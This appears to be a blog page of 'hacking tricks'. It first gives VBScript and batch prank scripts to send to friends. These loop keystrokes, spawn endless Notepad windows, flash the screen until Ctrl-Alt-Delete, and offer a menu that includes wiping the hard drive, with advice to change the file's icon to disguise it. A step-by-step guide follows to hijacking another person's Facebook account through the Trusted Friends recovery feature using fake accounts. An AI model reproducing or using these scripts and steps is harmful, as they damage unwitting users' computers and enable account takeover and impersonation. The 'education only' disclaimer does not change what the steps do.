WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

Open Notepad continually in your friend's computer:

Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

Hard prank: Pick your poison batch file. It asks your friend to choose a number

between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the
power to kill yourself. If you press 'x' then your PC will be formatted. Do not come
crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend,
so right click the file, click Properties, click on the 'Change' Icon and change the icon
from there.

THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors
until you hit a key to stop it, simply copy and paste the following code into notepad and
then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code
which will do the same thing except when they press a key the screen will go black
and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

Sunday 22 June 2014

Hack Facebook Account

Hence we know that there are many techniques for Hack Facebook Account like Phishing Attacks, Keylogging and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.

For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.

After success full addition of your fake accounts into victims account as friends follow the below steps .

1. Go to Facebook and click Forgot your Password ?

2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.

3. After entering everything check it again and click on search.

4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying
No Longer Access to These click that one.

5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.

6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.

7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account.
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Note: This Vulnerability has been fixed by Facebook

Note:only for education purpose only.......